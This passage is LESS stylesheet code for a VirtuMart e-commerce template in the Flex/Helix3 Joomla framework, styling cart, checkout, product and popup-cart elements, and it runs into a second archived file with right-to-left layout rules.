			img{
				display: inline-block;
			}
		}
	}
  //Cart Table
  table.cart-summary{
    border:1px solid #f5f5f5;
    border-top: 0 none;
    th,
    td{
      border-top:1px solid #f5f5f5;
	  padding:0;
    }
	thead {
		
	}

    tr{
		padding:0;
      th{
        text-align:center;
        text-transform:uppercase;
        padding:8px 2px;
        color:#fff;
		font-size:90%;
        .priceColor2{
          color:#fff;
        }
      }

      td {
        .priceColor2{
          color:#333;
        }
      }

      &.sectiontableentry1,
      &.sectiontableentry2{

        td{
          border-right:1px solid #e9e9e9;
          vertical-align: middle;
          padding: 25px 10px;
          text-align: center;
		  
        }
      }
	  

      &.sectiontableentry2{

        td{
          background: #f2f2f2;
		  
		  	input.coupon {
				border-radius:4px;
				width:68%;
				line-height:44px;
				height:44px;
				font-weight:bold;
				font-size:1.1em;
			}
			
		  	.details-button > input.details-button {
				border: 0;
				padding:10px 5%;
				color: #fff;
				.transition(300ms);	
			}
        }
        
        &.last{

          td{
            border-bottom:1px solid #f5f5f5;
            background:none;
              &.cart-total{
                text-align:right;
                text-transform:uppercase;
                font-weight:700;
                border-bottom:none;
              }
          }
        }
      }
    }
    input.details-button{
    	color: #fff;
    	padding: 5px 10px;
    	border: 0;
    }

    .cart-images {
		padding:0;
		margin:0;
		img {
      		max-width:80px;
		}
		& + a {
			display:table;
			padding:0;
			//float:left;
			margin:15px auto 0;
		}
    }

    input.quantity-input{
      margin:0 1px;
	  border-radius:4px 0 0 4px;
    }

    //Button
    .btn{
      box-shadow:none;
      .border-radius(~'0');
      border:0 none;
      text-shadow:none;
    }
    .input-append{
      margin: 0;

		input[type="text"] {
			background: #f7f7f7;
			border:1px solid #e0e0e0;
			.border-radius(3px);
			min-height: 35px;
		  }
			input:hover,
			input:focus{
				box-shadow: none;
			}  
			
   }

    input[type="text"] {
      line-height: 28px;
      min-height:28px;
	  width:32px;
      text-align: center;
      padding: 0;
      display: inline;
	  margin:0;
    }
    .vm2-add_quantity_cart{
    	width: 32px;
    	height: inherit;
    	padding: 0;
    	color: #fff;
		margin:0;
		> i {
			width: 26px;
			color:#fff;
			display:inline-block;
			font-size:15px;
			line-height:35px;
			
		}
    }
    .vm2-remove_from_cart{
    	width: 32px;
      	line-height: 35px;
      	min-height:35px;
    	padding: 0 5px;
    	background: #f5f5f5;
		border:1px solid #e0e0e0;
    	margin:0;
    	.border-radius(3px);
		input:hover,
		input:focus{
			box-shadow: none;
		}  
		> i {
			width: 20px;
			height:20px;
			color:#555;
			display:inline-block;
			font-size:15px;
			vertical-align:middle;
		}  	
    }
  }
   
    .checkout-button-top{
    	display:block;
		margin:10px 0;
		float:left;
    	border: 0;
		
    	.vm-button-correct,.vm-button{
			border:none;	
			padding:2px 25px;
			font-size:15px;
			min-width:100px;
			height:44px;
			border-radius:4px;
			.transition(300ms);
			>span {
				line-height:1.8;
				font-weight:normal;
				color:#fff;
				letter-spacing:normal;
			}
    	}
    } 
 }
/* Terms of service */
.vm-fieldset-tos {
	span.cart.tos {
		margin-right:4px;
	}
	
	div.terms-of-service {	
		label {
			margin-left:15px;
			a#terms-of-service {
				i {
					margin:0 3px;
				}
			}
		}	
	}
}


// *** START Checkout ***//
form.vm-form-login {
	background-color:#eee;
	border-radius:4px;
	padding:20px 25px;
	margin:20px auto;
	p {
		margin:0 auto;
	}
	fieldset.userdata{
		margin:0;
		#com-form-login-remember{
			input{
				width:auto!important;
				padding-left:32px;
				padding-right:32px;
			}
		}
		
	}
	.forgot {
		margin:10px 0 0 0;
		width:100%;
		display:block;
		.inputbox {
				margin-bottom:10px;
			}
	}
}
#com-form-login {
	.width30 {
		display:inline-block;
		margin:4px 6px 4px 0!important;
	}
}

#com-form-login-username,
#com-form-login-password{
	margin-bottom:5px;
	width:25%;
	
	input{
		border-radius:4px;
		box-shadow: none;
	}
}
#com-form-login-remember{
	width:auto;
	input.default{
		color: #fff;
		padding: 5px 20px;
		border: 0;
		border-radius:4px;
		min-width:130px;
	}
}
/* *** END:: CART PAGE *** */

/* *** CHECKOUT PAGE START *** */
.control-buttons{
	text-align: inherit !important;
	margin: 25px 0;
	clear:both;

	.register_btns {
		width:100%;
		display:block;
		clear:both;
	}
	.vm-button-correct{
		font-size: 16px;
		padding:6px 32px;
		letter-spacing:normal;
		font-weight:normal;
		line-height:1.4;
		/*color: #fff;*/
		.transition(300ms);
		
		&:before {
				 font-family: 'peIcon7';
				 content: "\e66c";
				 font-size:110%;
				 line-height:1.4;
				 vertical-align:top;
				 margin:-2px 8px 0 -8px;
			 }
	}
	button.default{
		color: #fff;
		padding: 5px 15px;
		margin:20px 1px;
		border: 0;
	}
}

#com-form-login-remember{
	input.default{
		.transition(300ms);
	}
}
.control-buttons{
	button.default{
		.transition(300ms);
	}
}

span.userfields_info {
	display:block;
	margin:20px auto 25px;
	width:100%;
	line-height:1.7;
	padding:12px 15px;
}
#shipmentForm {
	padding:20px;
}

// Checkout inputs
table.user-details{
	width:100%;
	tr{
		td{
			
			label {
				min-width:200px;
				text-align:right;
				padding-right:12px;
				
			}
			label, input, select {
				margin-bottom:8px!important;
				margin-top:3px!important;
			}
			input{
				min-width:50%;
				width:auto;
				
			
				box-shadow: none;
				background: transparent;
				&:hover{
					background: transparent;
				}				
			}
			select {
				//margin:15px auto;
			}
			input:hover,
			input:focus,
			input.invalid{
				box-shadow: none;
				background: transparent;
			}	
			.chzn-container-single .chzn-single {
				line-height:34px!important;
				height:35px!important;
				margin:3px auto;
			}		
		}
	}
}

/* *********** END::CHECKOUT PAGE  *********** */

.select_vm_wrap {
	.vm-select {
		.vm-payment-plugin-single,
		.vm-shipment-plugin-single {
			margin:12px;
			line-height:38px;
			.flexbox();		
			input {
				top:0;
				position:relative;
				
			}
		}
		label {
			span.vmpayment,
			span.vmshipment {
				float:left;
				text-align:center;
				margin-left:5px;
				position:relative;
				vertical-align:middle;
				
				.vmpayment_name {
					line-height:40px;
				}
				
				span.vmCartPaymentLogo,
				span.vmCartShipmentLogo {
					text-align:center;
	
					>img {
						text-align:center;
						margin:0 auto;
						max-width:140px;
						max-height:65px;
							
					}
					
				}
				
			}
		}
		
	}
}


// VM Order Done 

.vm-order-done {
	.post_payment_payment_name {
		margin:25px auto;
		img {
			margin:15px auto;
			text-align:center;
			max-width:130px;
			max-height:70px;
			
		}
		
	}
	.post_payment_order_total{
		margin:25px auto 35px;
		font-weight:bold;
		span {
			font-weight:normal;
		}
	}
	.vm-button-correct {
		padding:7px 35px;
		font-weight:normal;
		border-color: darken(@major_color, 2%);
		background-color: @major_color;
		background-color: fade(@major_color, 90%);
		color:#fff;
	
		&:hover,
		&:focus {
			border-color: darken(@major_color, 15%);
			background-color: darken(@major_color, 4%);
			color:#fff;
		}
	}
}

// View Order

.vm-orders-information {
	
	.btn-default {
		margin:0;
	}
	
	h2 {
		margin:20px auto 40px;
		a {
			margin:0 12px;
			i.pe {
				font-size:85%;
			}
		}
	}
	.vm-orders-order {
		margin:40px auto;
		
		img {
			margin:15px 0;
			max-width:130px;
			max-height:70px;
		}
	}
	.vm-orders-items {
		ul#tabs {
			
			li {
				line-height:32px;
				padding:5px 25px 7px!important;
				border-radius: 4px 4px 0 0;
				margin:25px 2px 0 0;
				&.current {
					color:#fff!important;
					background-color: fade(@major_color, 90%)!important;
					
				}
			}
		}
		.tabs {
			border:1px solid #ccc;
			border-radius:4px;
			padding:20px;
		}
	}
	
}



.product-price {
	display:block;
	.vm-price-desc,
	.vm-price-desc+span {
		margin:0!important;
	}
}

.orderby-displaynumber{
  border:none;
  margin:0 auto;
  padding: 10px 0 30px 0;

	.vm-order-list {
		.orderlistcontainer{
			cursor: pointer;
			-webkit-transition: all .5s ease-in-out;
			transition: all .5s ease-in-out;
			border-radius:3px;
			padding:0;
			margin:0;
			
			.title {
				display:inline-block;
				padding:5px 8px 5px 15px;
				font-size:14px;
				-webkit-transition: all .5s ease-in-out;
				transition: all .5s ease-in-out;
				
				&:before {
					font-family:"peIcon7";
					content:"\e659";
					margin:0 auto;
					padding:0 8px 0 0;
					font-size:17px;
					line-height:1.5;
					vertical-align:top;
				}
			}
			.activeOrder, .Order {
				background-image:none;
				display:inline-block;
				border:none;
				padding:0 15px 0 0;
				font-size:14px;
				position:relative;
			}
			.orderlist {
					-webkit-transition: all .25s ease-in-out;
					  transition: all .25s ease-in-out;
					  border:0;
					  border-radius:0 0 4px 4px;
					  cursor: pointer;
					  visibility:hidden;
					  opacity:0;
					  display:block;
					  margin-top:-10px;
					  div {
						padding:0;
						 margin:0;
						  width:170px;
						 -webkit-transition: all .25s ease-in-out;
						  transition: all .25s ease-in-out;
						  a {
							 padding:5px 15px;
						  }
						  &:hover {
							  background:#f0f0f0;
						  }
					  }
		
			}
			
			&:hover {
					.orderlist {
						opacity:1;
						display:block;
						visibility:visible;
						margin-top:1px;
					}
			}
				
			
		}
	}
	.display-number {
		margin:0;
		padding:5px;
		text-align:right;
		font-size:14px;

		>span {
			margin:0 10px 0 0;
			text-align:right;
			float:left;
			line-height:2;
		}
		select {
			max-width:60px;
			text-align:left;
			
		}
		.chzn-container-single,
		.chzn-single {				
			max-width:60px;
			text-align:left;
			display:block;
			margin:-3px 0 0;
		}
	}

}




//shop-category vm-module, search box
.sp-module-content{
	ul.VMmenu{
		li{
			padding:0;
			display:block;
			position:relative;
			
			a{
				display: block;
				padding: 2px 12px;
				line-height:36px;
				border:0;
				
				>.nmb_products {
					padding:1px 6px;
					margin:0 3px;
					color:#555;
					font-size:85%;
					text-align:center;
					background-color: #fff;
					border:1px solid #eee;
					border-radius:3px;
				}
				&:hover{
					background-color: #f9f9f9;
				}
			}
			&:hover{

				> a{
					>.nmb_products {
						background-color: #fff;
						border:1px solid #eee;
					}
				}
			}
			.vmmenu-toggler {
				display: inline-block;
				position: absolute;
				top: 0;
				right: 0;
				padding-right:10px;
				width:33%;
				line-height: 41px;
				cursor: pointer;
				
				.open-icon {
					padding-left:calc(100% - 10px);
				}
				
				.open-icon {
					text-align:center;
					color:#777;
						
					&:before {
						line-height: 32px;
						text-align:center;
						position: absolute;
						right: 10px;
						top: 5px;				
						-webkit-transform: rotate(180deg);
						transform: rotate(180deg);
						.transition(all 0.2s);
					}
					
				}
	
				&.collapsed {
					.open-icon {
					
						&:before {
							-webkit-transform: rotate(0deg);
							transform: rotate(0deg);
						}
					}
				}
			}
			
			ul {
				li {
					padding:0;
					a {
						text-indent: 10px;
						box-shadow:inset 0 1px 0px rgba(62,62,62,0.1);
						>.nmb_products {
							padding:1px 6px;
							margin:0 5px;
						}
					}
				}
				ul {
					li {					
						a {
							text-indent: 20px;
						}
					}
				}
				
			}
			&.active {
				
				> a {
					background-color: #f9f9f9;
					color:@major_color;
				}
				
				ul {
					
					> li.active {					
						> a {
							background-color: #f9f9f9;
							color:@major_color;
							
						}
					}
				}
			}
			
		}
	}
}
.flex-search {
	input#mod_virtuemart_search {
		width:100%;
		border-radius:4px;

		&:focus {
			box-shadow:none;
		}

	}
}
.searched-word {
	color:#aaa;
	line-height:1.5;
}
.vm-flex-search {

	input {
		min-width:250px;
		border-radius:4px;
		z-index:1;
		float:left;
		-webkit-transition: 300ms;
		transition: 300ms;
		&:focus {
			box-shadow:none;

			+ .vm-search-button {
				box-shadow:inset 1px 0 0px #e3e3e3;
			}	
		}
	}
	/* icon fa-search */
	.vm-search-button {
		position:absolute;
		display:inline-block;
		margin:1px 0 0 -42px;
		z-index:2;
		width:40px;
		height:32px;
		background:transparent;
		border:0;
		outline:0;
		box-shadow:inset 1px 0 0px #f3f3f3;

		>i {
			width:40px;
			line-height:2;
			padding-left:3px;
			text-align:center;
			vertical-align:middle;
			opacity:0.9;
		}
	}
}
.currency-selector-module {
	width:100%;
	select {
		display:inline-block;
		width:75%;
	}
	button.btn,
	input.btn {
		padding:0;
		margin:0;
		display:inline-block;
		border:1px solid rgba(83,83,83,0.34);
		width:20%;
		vertical-align:top;
		>i {
			padding:5px 7px 5px 7px;
			margin:0;
			line-height:22px;
			width:30px;
			text-align:center;
		}
	}
}

//Select
.chzn-container {
	min-width:50%;
	.chzn-single {
		line-height:32px!important;
		height:33px!important;
		div {
		  top:2px!important; 
		}
	}
}

.chzn-container-active {
	&.chzn-with-drop {
		.chzn-single  {
		     border: 1px solid #aaa!important;
		}
		.chzn-results {
			li {
				line-height:18px!important
			}
		}
	}
}

.quantity-box {
	input {
		width:24px;
		height:24px;
		padding:0;
		margin:0;
		left:0;
		background:rgba(0,0,0,0.05);	
		border:1px solid #e0e0e0!important;
		&:hover {
			background:rgba(0,0,0,0.04)!important;	
		}
	}
}

//shop-product vm-module

.default-style {
	.product-single-style{
		text-align:center;
		border-bottom:none;
		.spacer {
			//padding:20px;
			
			h3 {
				font-size:125%;
				margin:20px auto 15px;
			}
			.PricesalesPrice{
				margin:15px auto;
				font-size:125%;
				text-align:center;
			}
		}
	}
	.addtocart-area {
		margin:10px auto;
		
		.addtocart-bar {
			margin:0 auto;
			display:block;
			text-align:center;
			
			button.add-to-cart {
				font-size:105%;
			}
		}
	}
	.product_list {
		.spacer {
			.spacer-img{
			   	padding:3.9%;
			}
		}
	}
}
.singleview {
	
	.product-single-style {
		
		.spacer {
		
			.product-image {
				padding:0 10px;
			}
			
			.spacer-inner {
				padding: 1% 3%;
	
				.PricesalesPrice {
					margin-top:20px;
					font-size:130%;
				}
				.addtocart-area {
				
					.cd-customization {
						font-size:100%;
					
						button.add-to-cart {
							height:35px;
							width:130px;
							>input {
								line-height:35px;
								
							}
						}
					}
				}
				
			}
		}
	}
}
.vmgroup {
		.vm-product{
			display:block;
			&.productdetails {
				li{
					text-align: initial;
					padding:15px 0 8px;
					border-bottom:1px solid #e5e5e5;
					
					.spacer-img {
						width:33%;
						display:inline-block;
						margin:0 auto;
						border:1px solid rgba(50,50,50,.15);	
						overflow:hidden;
						.transition(300ms);
						opacity:0.9;
						img{
							width:100%;
							height:80px;
							object-fit: cover;		
						}
						&:hover {
							opacity:1;
						}	
					
					}
					.spacer-inner {
						width:64%;
						display:inline-block;
						vertical-align:top;
						padding:0 10px;
						margin:0;
						h5 {
							display:block;
							width:100%;
							font-size:110%;
							padding:0;
							margin:0;
							line-height:1.4;
						}
						.PricesalesPrice {
							margin:8px auto;
							font-size: 18px;
						}
					}
				}
		
			}
		}
		hr.divider {
			margin:10px auto;
			border:none;
			box-shadow:none;
		}
		
		.addtocart-area {
				display:block;
				clear:both;
				width:100%;
				margin:0 auto;
				
			.addtocart-bar {
				display:block;

				margin:0 auto 5px;
				padding:0;
							
				.calculate {
					display:table;
					left:0;
					margin:5px 8px 0 0;
					width:44px;
					padding:0;
					float:left;
					label {
						display:none;	
					}
					.quantity-box {
						padding:0;
						margin-left:0;
						font-size:80%;
						input {
							width:22px;
							height:22px;
							
							padding:0;
							margin:0;
							left:0;
						}
					}
					.quantity-controls{
						background-image:none;
						margin:0 0 0 -3px;
						
						input.quantity-plus,
						input.quantity-minus {
							display:block;
							position:absolute;	
							z-index:2;			
						}
						input.quantity-plus{
							width:20px;
							height:16px;
							margin:-16px 0 0 0;
						
							&:hover {
								& + .fa {
									color:#999;
									
								}
								& + .fas, & + .far {
									color:#999;
									
								}
							}
							
						}
						input.quantity-minus{
							width:20px;
							height:16px;
							margin:0 0 0 0;
							
							
							&:hover {
								& + .fa {
									color:#999;
									
								}
								& + .fas, & + .far {
									color:#999;
									
								}
							}
							
						}
						.fa, .fas, .far {
							position:absolute;					
							z-index:1;
							font-size:9px;
							line-height: 12px;
							color:#bbb;
							
							&.fa-chevron-up {
								margin:-13px 0 0 3px;
							}
							&.fa-chevron-down {
								margin:0 0 0 3px;
							}
						}
					}
					
				}
				
				.cd-customization {
					width:auto;
					display:table;
					font-size:75%;
					button.add-to-cart {
						height:32px;
						width:100px;
						display:block;
						>input {
							line-height:28px;
							
						}
					}
				}
			}
		}
		
}

.vm-shipment-select,.vm-payment-select {
	
	padding:0;
	
	div {
		padding:1%;
		margin:0 0 7px 0;
		
		input[type="radio"] {
			display:none;
			
		}
		input[type="radio"]:checked {
		
			& + label {
				border:1px solid fade(@major_color, 90%);
				box-shadow:0 1px 5px fade(@major_color, 20%);
			}
		}
		
		label {
			display:block;
			text-align:center;
			margin:0 auto;
			line-height:18px;
			/*width:55%;*/
			cursor:pointer;
			border:1px solid transparent;
			padding:10px;
			border-radius:4px;
			.transition(all 300ms ease-in-out);
			
			&:hover {
				border:1px solid rgba(25,25,25,.1);
			}
		}
	}
}

// Custom radios for Custom fields (from Flex 3.9)
.category-view {
	.product-fields {
		.product-field {
			text-align:center;
		}
	}
}
.product-fields {
	.product-field {
		margin:0 auto;
	}
	
	span.hasTooltip {
		width:auto;
		height:auto;
		padding:4px 4px 0;
		display:inline-block;
		margin-bottom:-2px;
		
		img {
			margin:0 auto;
			display:table;
			float:none;
		}
	}
	.product-field-display {
		
		//text-align:left;
		margin:10px auto 10px;
		//border:2px solid red;
	
		label {
			 -webkit-font-smoothing: antialiased;
			 -moz-osx-font-smoothing: grayscale;
			 cursor: pointer;
			 margin:0 5px 5px 0;
			 display:inline-block;
			 
			 input.form-radio{
				 -webkit-appearance: none;
				 -moz-appearance: none;
				 appearance: none;
				 display: none;
				 height: 0;
				 width: 0;
				 border: 0;
				 opacity: 0;
				 outline: none;	
			}
		
			span.checker,
			span.checker-select {
				line-height:25px;
				display:block;
				float:right;
				border:1px solid #ccc;
				color:#595959;
				padding:4px 18px;
				border-radius:4px;
				
			}
			span.checker-select {
				background:#f3f3f3;
				padding:4px 35px;
			}
			input.form-radio:hover + span.checker {
				 border:1px solid #999;
				
			}
			input.form-radio:checked + span.checker {
				 color:darken(@major_color, 10%);
				 border:1px solid darken(@major_color, 10%);
				 padding-left:22px;
				 opacity:1;
			}
			
			input.form-radio + span.checker::before {
				 opacity:0;
				 content: '';
				 transform: rotate(30deg) scale(0);
				 .transition(all .5s ease);
			}
			
			input.form-radio:checked + span.checker::before {
				 position: relative;
				 display:inline-block;
				 left: -8px;
				 top: -2px;
				 content: '\02143';
				 transform: rotate(40deg) scale(1);
				 color:@major_color;
				 font-weight: bold; 
				 opacity:1;
			}
		} 
		.vm-cmv-label {
			margin:2px 12px 10px 0;
			display:inline-block;
			vertical-align:top;
			font-weight:bold;
			color:#555;
		}
	}
}



// Popup Cart (Add to Cart Fancybox)
.popup-cart{
    overflow: hidden;
	margin:0 auto -20px;
	padding:0!important;

    h3.title{
        font-size: 20px;
        line-height: 28px;
        margin-bottom: 40px;
        text-align: center;
        color: #4b4b4b;
		span {
			display: block;
			font-weight: 600;

		}
    }
	
    .popup-cart-product-quantity{
        font-weight: 500;
    }
    .item-wrap{
        overflow: hidden;
        clear: both;
        width: 560px;
        margin-bottom: 0px;
		text-align:left;
		padding:0;
		
		.item-name{
			font-size: 120%;
			font-weight: 600;
		}
		
		 /*vm-price-box*/
		.vm-price-box{
			line-height: 35px;
			text-align: center;
			display: inline-block;
			clear: both;
			text-align:left;
			
			ins{
				font-size: 28px;
				line-height: 42px;
				text-decoration: none;
				float: left;
				letter-spacing: -2px;
				margin-right: 10px;
			}
			del{
				font-size: 16px;
				color: #8d8d8d;
				letter-spacing: -1px;
				float: left;
				span{
					vertical-align: baseline;
				}
			}
		}
		
    }
    .button-group{
        text-align: center;
		margin:30px auto 0;
		
	    .continue_link,.showcart{
			width:43%;
		    display:block;
			float:left;
			left:0;
			margin:0 auto;
		    padding: 10px 0;
			border-radius:4px;
	    }
		.continue_link {
			margin:0 24px 0;
			&:before {
				font-family: "peIcon7";
				position:relative;
				color: #fff;
				font-size: 17px;
				line-height:1.2;
				content: "\e66e";
				margin: 5px 8px 0 0;
			}
		}
		.showcart {
			margin:0;

			
		}
    }
    
    .item-img{
        float: left;
        margin-right: 30px;
        img{
            max-width: 150px;
        }
    }

}




//Header (title) in Megamenu
.vm-menu {
	.divider {
		display:none;
	}
	.vm-title {
		font-size:110%;
		margin:12px auto 0;
		padding:15px 0 5px;
		line-height:1.3;
	}
	ul {
			&.productdetails {
				
			li{
				text-align: initial;
				padding:15px 0 8px;
				box-shadow:0 1px 0px rgba(220,220,220,.3);
				
				.spacer-img {
					width:30%;
					display:inline-block;
					margin:0;
	
					img{
						height:60px;
						object-fit: cover;				
					}
				
				}
				.spacer-inner {
					width:68%;
					display:inline-block;
					vertical-align:top;
					padding:0 10px;
					margin:0;
					h5 {
						display:block;
						width:100%;
						font-size:90%;
						padding:0;
						margin:0;
						line-height:1.4;
					}
					.PricesalesPrice {
						margin:10px auto;
						font-size: 17px;
					}
				}
			}
		}
		&:last-child {
			li {
				padding:15px 0 0;
				box-shadow:none;
				.PricesalesPrice {
					margin:10px auto 0;
				}
			}
		}
	}
}

// Edit page
.edit-shopper-form {
	div.btn {
		margin:7px 7px 0 0;
		padding:6px 12px;
		a {
			padding:0;
			>img {
				display:none;
			}
		}
	}
	
	// Tabs
	#ui-tabs {
		margin:25px auto;
		
		li {
			padding:4px 20px!important;
			line-height:32px!important;
			height:40px!important;
			border-radius:5px 5px 0 0!important;
		}
		>div {
			padding:0;
			margin:0;
			border-top:1px solid #ccc;
			background:transparent!important;
			
			li {
			     height:36px!important;
				 padding:2px 5px!important;
				 border-radius:0!important;
			}
		}
	}
}

@media (max-width: @screen-md-min) {
	.responsive-sm, .responsive-sm > div {
	  padding:0!important;
 	}
}
@media (max-width: @screen-sm-min) {
	
	#com-form-login {
		margin:20px auto;
		padding:0 5%;
		.width30 {
			width:100%;
			margin:5px auto!important;
		}
	}
	#vmCartModule {
		position:relative;
		right:10px;
		width:60px;
	
		#cd-menu-trigger,
		.cd-cart {
			width:60px;
			margin:0 auto;
			text-align:center;
			
			>i {
			   text-align:center;
			   margin:0 auto;
			   width:60px;
			   
			}
			.total_products {
				right:3px;
			}
			
			&.shopping-menu-is-open {
				
				.cd-cart {
				
					.total_products {
						right:3px;
					}
				}
			}
		} 
	}
	
	
	header.centered, header.addspace {
		
		#cart-menu {
			.cd-cart {
					margin:0 auto;
					top:0!important;
					text-align:center;
				i {
					margin:0 auto;
					width:90px;
					text-align:center!important;
				}
				.total_products {
					right:-12px!important;
				}

			}
			&.shopping-menu-is-open {
				
				.cd-cart {
				
					.total_products {
						right:18px!important;
					}
				}
			}
		}
	}
	
	.browse-view {
		.row.productwrap {
	
			padding: 0;
			margin: 0;
			.product {
				width: 100%;
				
				.cd-customization {
					
					width:calc(75% - 10px)!important;
					
					
				}
				.calculate {
					width:25%!important;
					margin:4px 10px 0 0;
				
				}
			}
		}
	}
	
	.form-validate {
		padding:10px 4%;
	}
	
	// Checkout inputs
	table.user-details{
		width:100%;

		tr{
			
			td{
				
				/* Fix for mobile: 100% width */
				width:100%;
				clear:both;
				display:block;
				
				
				label {
					clear:both;
					display:block;
					margin:12px 0 0!important;
					text-align:left;
				}
				input, select {
					min-width:100%;
				}
				input {
					min-height:39px;
				}
				select {
					width:auto;
					line-height:38px;
					height:38px;
				}
				
				.chzn-container-single .chzn-single {
					line-height:37px!important;
					height:38px!important;
				}	
						
			}
		}
	}
	
	.vmgroup {
		.vm-product{
			&.productdetails {
				li{
					.spacer-img {
						width:25%;
						img{
							width:100%;
							height:120px;
						}
					}
					.spacer-inner {
						h5 {
							font-size:120%;
							line-height:1.4;
						}
						.PricesalesPrice {
							margin:12px auto;
							font-size: 20px;
						}
					}
				}
				.cd-customization {
					font-size:80%;
					button.add-to-cart {
						height:32px;
						width:140px;
						>input {
							line-height:28px;	
						}
					}
				}
			}	
		}	
	}
	
	// Popup Cart (Add to Cart Fancybox)
	.popup-cart{

		.item-wrap{
			width: 100%;
			text-align:center;
			
			.item-name, .vm-price-box, .popup-cart-product-quantity {
				text-align:center!important;
				float:none!important;
			}
		}
		.button-group{
			text-align: center;
			margin:30px auto 0;
			
			.continue_link,.showcart{
				width:100%;
				display:block;
				margin:0 auto;
			}
			.continue_link {
				margin:0 auto 10px;
			}
		}
		
		.item-img{
			float: left;
			width:100%;
			margin:0 auto;
			img{
				width: 100%;
			}
		}
	}
	
	//Cart Table
  	table.cart-summary{
		.responsive-xs {
			padding:10px 0!important;
		}
		.xs-cart-btn {
			width:40px!important;
			display:block;
			margin:0 auto;
			text-align:center;
			border-radius:0!important;
		}
	}	
}PK!ihKN׮׮flex/less/rtl.lessnu&1i�/**
 * Flex @package Helix3 Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

@import 'variables';
@import 'mixins';


/* RTL Direction
 *=======================================*/
 
 .offcanvas {
	.off-canvas-menu-wrap {
		left: 0;
		right:auto;
		-webkit-transform: translateX(320px);
		transform: translateX(320px);
	}
	.off-canvas-menu-wrap:after {
		left:0;
		right: auto;
	}

}

body {
 	&.rtl {
	
		
		.sppb-shape-container svg{
			width:100%!important;
			height:auto;
		}


		#sp-top-bar {
			#sp-top1 {
				.sp-column {
					float:right;
				}
			}
			#sp-top2 {
				.sp-column {
					float:left;
				}
				
			}
			
		}

		//top contact info
		.sp-contact-info {
			float: right;
			margin: 0 0 0 10px;
		}


		// Language switcher
		.sp-module-content {
			.mod-languages {
				margin-left:12px;
				//float:left;
				.dropdown-toggle {
					padding:3px 14px 3px 10px;
					

					img {
						padding:2px 0 0 7px;
						float:right;
						
					}
					>i {
						padding:0 4px 0 0;
						
					}
					
				}
				.dropdown-menu {
					
					li {	
						a {
							img {	
								float:right;
								padding:0 0 0 8px;
								
							}
							
						}			
						
					}
				}
		
				ul.lang-inline {
					li {

						margin: 0 0 0 5px;
		
						&:last-child {
							margin-left:0;
						}
					}
				}
				ul.lang-block.vertical {
					
					li {

						text-align:right;
		
						a {
							float:right;
							display:block;
		
							img {
								float:right;
								direction:rtl;
								text-align:right;
								padding:4px  0 0 8px;
							}
							span {
								float:right;	
							}
		
						}
						&.lang-active {
							a {
								i {
									padding:0 6px 0 0;
								}
							}
						}
					}
				}
			}
			
			ul.VMmenu{
				> li{
					.vmmenu-toggler {
						display: inline-block;
						position: absolute;
						top: 0;
						left:0;
						right: auto;
						padding-left:10px;
						padding-right:0;
						
						.open-icon {
							
								
							&:before {
								right:auto;
								left:10px;
	
							}
							
						}
					}
				}
			}
		}

		//Top search
		 
		.top-search-input-wrap{
		
			.top-search-wrap {
				left:-10px;
				right:auto;
				float:right;
			}
		}


		.body-innerwrapper:after {
			left: 0;
		}

		//Offcanvas
		#offcanvas-toggler {
			float: left;
		}
		#offcanvas-toggler >i {
			padding: 0 10px 0 0;

		}
		.offcanvas-menu {
			left:0;
			right: auto;
			-webkit-transform: translateX(-320px);
            transform: translateX(-320px);
		}
		
		
		.close-offcanvas {			
			left: 15px;
			right:auto;			
		}
	
		.offcanvas-menu {
			top: 0;
			left: 0;
			right: auto;
			 -webkit-transform: translateX(-320px);
			transform: translateX(-320px);		
			
			.offcanvas-inner {
				.sp-module {
					ul {
						> li{
							a, .nav-header, .separator {
								>img {
									margin:-4px 0 0 7px;
								}
							}
						}
						// Accordion menu (offcanvas)
						&.accordion-menu {
							> li{
								.offcanvas-menu-toggler {
									left: 0;
									right:auto;
									padding:11px 25px 11px 20px;
								}
								
								.accordion-menu-toggler {
									left:0;
									right: auto;
									
									.open-icon {
										&:before {
											left: 0;
											right:auto;
											width:44px;
										}	
									}
								}			
							}
						}
					}
				}
			}
			
		}

		&.offcanvas {
			.offcanvas-menu {
				-webkit-transform: translateX(0);
            	transform: translateX(0);
			}
		}
		
		
		
		.readmore {
			margin:0 0 0 20px;
			float:right;
		}
		
		.helix-social-share{
			.helix-social-share-blog {

				float: right;
				
			}
		}
		.tags {
			float:right;
			margin:7px 0 0 20px;
			>span {
				>i {
					margin:0 3px 0 5px;
				}
			}
		}
	
		//Latest Articles (module)
		.latest-articles{
			a{
				float: right;
				
				
				.article-list-img{
					float: right;
					margin: 0 0 0 15px;
					
					
				}
				
				.date {
					float: right;
					margin: 0 0 0 15px;
				}
			}
		}
		
		//Related Articles (module)
		.relateditems {
			.relateditem {
				a{
					float: right;
					text-align:right;
					
					.article-list-img{
						float: right;
						margin: 0 0 0 15px;
					}
					
					.related_date {
						margin: 10px 15px 0 0;
					}
				}
			}
		}
		
	    /* - Cart module - */
		
		#cart-menu,
		.cd-cart {
			float:left;
			left:0;
			right:auto;
			
			
			>i {
				font-size:36px;	  
			}
			.total_products {
				top: 23px;
				left: 0!important;
				right:auto;
				float:left;
			}
		
		}
		#cart-menu {
			position: relative;
			float:left;
			left:0!important;
			right:auto;
			-webkit-transform: translateX(0);
			-moz-transform: translateX(0);
			-ms-transform: translateX(0);
			-o-transform: translateX(0);
			transform: translateX(0);
			
			&.shopping-menu-is-open {
				left:0;
				float:left;
				
				#cd-menu-trigger,
				.cd-cart {
					left:0;
					float:left;
					
					  >i {
						  
						  right:auto;
						  float:left!important;
						  left:0!important;
						  padding-right:0;
						 
					  }
					
					
					&.menu-is-open {
						float:left;
						>i {
						   float:left;
						   position:relative;
						}	
					}
				} 
			}
			
		}
		
		
				
		#cd-lateral-nav {
			right: auto;
			left:0;
			-webkit-transform: translateX(-260px);
			-moz-transform: translateX(-260px);
			-ms-transform: translateX(-260px);
			-o-transform: translateX(-260px);
			transform: translateX(-260px);
			
			.cart-image {	
				float:right!important;
			}
			
			.cart-item {
				padding-right:10px;
				padding-left:0;
			}
			
			.show_cart {
				a {
					>i {
						margin-left:10px;
						margin-right:-5px;
					}
				}
			}

		}
		#cd-lateral-nav.shopping-menu-is-open {
			-webkit-transform: translateX(0);
			-moz-transform: translateX(0);
			-ms-transform: translateX(0);
			-o-transform: translateX(0);
			transform: translateX(0);
			
		}
		
		#cart-menu.shopping-menu-is-open {
		  position:fixed;
		  -webkit-transform: translateX(260px);
		  -moz-transform: translateX(260px);
